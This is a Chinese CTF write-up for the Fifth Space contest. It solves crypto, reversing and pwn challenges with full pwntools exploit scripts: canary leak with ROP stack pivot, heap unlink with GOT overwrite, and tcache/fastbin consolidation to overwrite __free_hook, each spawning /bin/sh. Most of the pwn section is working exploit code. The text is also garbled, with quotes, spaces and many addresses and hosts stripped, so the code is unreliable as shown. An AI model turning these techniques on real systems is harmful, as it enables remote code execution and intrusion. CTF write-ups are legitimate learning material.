第五空间6月24日比赛的部分WP.
目录
crypto
rosb
rsa共模攻击,网上找了个板子改了改
romgmpy2import*
importlibnum
n=0xa1d4df1b8d5bceb49dc8a02f12df9ae80e2a6ee13b7a97d9fe3dd7ac24ab25ab87dde7c6c4cee3fb3ec9b7fdbddde1f0f1a2bba52bad1adb31db9ee1bf9facce8fbfebcff27b7bf7d29cc3fddf7ea31cad59aaecdee7bec4c4dad39dc2b9ceac89fa8e3a4bdb8e7d6da0d9a0d8a3c1acedebe1ccccb0e9dfcddaa18c45a65baba4c5aefa1e67eccd9fcda08dfece8f7fdfff0c4e72a
e1=0xf4cf
c1=0x2fff19fe6ad76efa3cbc07fef5dff8d3ddfcaf9daaa29ce87c1cbbf2dba2eca8b7adba5edac4ffeb3b0c85c3bc0e4aedeaec2fcc5ff99bc3f83ffbaba86cda0f6a9cd4c70be8f36c3ceaae15b5bf0bffbf08ce5aa6c45bdc80c59a9f70a92dc70eebec15d4a5ebfe0d3d14f3ad9ad8eaaf14da59eba2e8ad3adbeede21ac41ab2c7ba3cbd4aa8bad4cc39f02e05ce95a69cc29f6bbc11e4e0cdbd0ecddb38ec8a
e2=0xff7d1
c2=0xd32dfad68ddf2d8bf46bbae5ccf2f3aecbc1cdaea06abaf7d0dbfebdbe58338d1da8a78fe0daee8c1e6addbffc15f1bdcbe4bbe8adb7d15febdf5a87fa4c6c51acaf60aeba3dcdaeddb57da4dc29a2b2ec34c99cdd6bf5d5d01eed47ca7fb8ae7caf2dc20e14c7bd9f7bcd7cda9e3bfb00c2bc9a5abceecc8ffc59ab3bfc19fdaa4fb3ecef3b4cbf4bf76b8ab25bffe53de77eeee6ffbc36f6cc715cddc73dcbcb
s=gcdext(e1,e2)
s1=s[1]
s2=-s[2]
c2=invert(c2,n)
m=(pow(c1,s1,n)*pow(c2,s2,n))%n
print(hex(m))
s=hex(m)[2:]
result=
foriinrange(len(s)/2):
result+=chr(int(s[2*i:2*i+2],16))
print(result[:-64])
#g0od_go0d_stu4y_d4yd4y_Up
re
nop
main函数里存在三个需要nop的反调试的函数(共五处),nop后的逻辑是:输入数字,然后通过eax一直加(大约是反调试jump的次数)+0xCCCCCCCC,最后的值用于在函数sub_中patcheax和eax+1的值为0x90。因此正确的patch才能跳转到right处,由于中间eax+1有点多不想数b,所以大概算了个值(考虑一下32位溢出),然后前后遍历了一小段数字,得到flag为
rev
本意是一个rop导向的逆向题,但写trace太麻烦了,所以试了下angr的模板,正好可以用,注意一下输入参数为argv1
pwn
twice
第一次溢出一个字节用于泄露canary和栈地址,第二次溢出0x20字节,其中除了填写canary外,rbp位置存放字符串起始栈地址-8,返回地址填leaveret,这样就可以多出88字节的ROP。ROP主体为puts泄露libc地址、read往bss(也可以继续往栈上)写入system(/bin/sh\x00)的另一段ROP,最后栈转移,正好`88字节。
frompwnimport*
fromLibcSearcherimportLibcSearcher
e=ELF(./pwn)
libc=e.libc
ifargs.I:
context.log_level=debug
ifargs.R:
p=remote(.36.59.,)
else:
p=process(e.path)#,env={LD_PRELOAD:LIBC})
p.sendafter(,A*89)
p.recvuntil(A*89)
canary=u64(p.recv(7).rjust(8,b\0))
stack=u64(p.recv(6).ljust(8,b\0))
print(hex(canary))
print(hex(stack))
p.recvuntil()
pop_rdi_ret=0x400
pop_rsi_r15_ret=0x
pop_rsp_13_14_15_ret=0xd
leave_ret=0x
bss=0x
payload=p64(pop_rdi_ret)
payload+=p64(e.got[puts])
payload+=p64(e.plt[puts])
payload+=p64(pop_rsi_r15_ret)
payload+=p64(bss)
payload+=p64(0)
payload+=p64(pop_rdi_ret)
payload+=p64(0)
payload+=p64(e.plt[read])
payload+=p64(pop_rsp_13_14_15_ret)
payload+=p64(bss)
print(len(payload))
p.send(payload+p64(canary)+p64(stack-0x18-88-8)+p64(leave_ret))
p.recvline()
puts_addr=u64(p.recv(6).ljust(8,b\0))
print(hex(puts_addr))
libcsearch=LibcSearcher(puts,puts_addr)
libcbase=puts_addr-libcsearch.dump(puts)
system_addr=libcbase+libcsearch.dump(system)
binsh_addr=libcbase+libcsearch.dump(str_bin_sh)
p.send(p64(0)*3+p64(pop_rdi_ret)+p64(binsh_addr)+p64(system_addr))
#print(p.pid)
p.interactive()
运行实例:
print(p.pid)
p.interactive()
pwnme
因为除了off-one-null-byte外更严重的是有任意长度堆溢出的操作,一开始想的是使用overlapping,但因为环境一直搭不起来拿不到unsortedbin的偏移,又看到没开PIE并且GOT表可写,所以最后换了unlink来做。unlink后泄露free地址再填入system地址一把梭。
frompwnimport*
fromLibcSearcherimportLibcSearcher
e=ELF(./a.out)
libc=ELF(./lib/libuClibc-1.0.34.so)
#libc=e.libc
ifargs.I:
context.log_level=debug
ifargs.R:
p=remote(.36.58.,)
else:
p=process(e.path)#,env={LD_PRELOAD:LIBC})
defShow():
p.sendlineafter(,1)
defAdd(lenth,tag):
p.sendlineafter(,2)
p.sendlineafter(Length:,str(lenth))
p.sendafter(Tag:,tag)
defChange(ind,lenth,tag):
p.sendlineafter(,3)
p.sendlineafter(Index:,str(ind))
p.sendlineafter(Length:,str(lenth))
p.sendafter(Tag:,tag)
defRemove(ind):
p.sendlineafter(,4)
p.sendlineafter(Tag:,str(ind))
chunk=0x
ptr=chunk+4+8
Add(0x50,yuri)#0
Add(0x,yuri)#1
Add(0xf8,yuri)#2
Add(0x50,/bin/sh\x00)#3
Change(1,0x+4,b\0*8+p32(ptr-3*4)+p32(ptr-2*4)+b\0*+p32(0x-2*4))
Remove(2)
Change(1,7,p32(0x50)+p32(e.got[free])[:-1])
Show()
p.recvuntil(:)
base=u32(p.recv(4))-libc.symbols[free]
Change(0,4,p32(base+libc.symbols[system]))
Remove(3)
#print(p.pid)
p.interactive()
运行实例:
of
只给源码的pwn,先把tcache填满使得后续堆块释放到fastbin,然后利用scanf触发malloc_consolidate释放到unsortedbin泄露libc地址,最后便是常规改__free_hook的操作。这里比较奇怪的是泄露的unsortedbin的地址多了0x,第一次见这种操作。
frompwnimport*
fromLibcSearcherimportLibcSearcher
#e=ELF(./pwn)
libc=ELF(./libc-2.27.so)
ifargs.I:
context.log_level=debug
r=remote(.36.74.70,)
defallocate(ind):
r.sendlineafter(Yourchoice:,1)
r.sendlineafter(Index:,str(ind))
defdelete(ind):
r.sendlineafter(Yourchoice:,4)
r.sendlineafter(Index:,str(ind))
defshow(ind):
r.sendlineafter(Yourchoice:,3)
r.sendlineafter(Index:,str(ind))
r.recvuntil(Content:)
returnr.recv(0x-8)
defedit(ind,content):
r.sendlineafter(Yourchoice:,2)
r.sendlineafter(Index:,str(ind))
r.sendafter(Content:,content)
foriinrange(7):
allocate(i)
allocate(7)
allocate(8)
foriinrange(7):
delete(i)
delete(7)
foriinrange(7):
allocate(i)
allocate(9)#7==9
foriinrange(7):
delete(i)
delete(7)
r.sendlineafter(Yourchoice:,7*0x)
base=u64(show(9)[:8])-96-0x10-libc.symbols[__malloc_hook]-0x
free_hook_addr=base+libc.symbols[__free_hook]
system_addr=base+libc.symbols[system]
print(hex(base))
foriinrange(7):
allocate(i)
allocate(7)
delete(7)
edit(9,p64(free_hook_addr-8))
allocate(10)
allocate(10)
edit(10,b/bin/sh\x00+p64(system_addr))
delete(10)
r.interactive()
misc
签到
flag{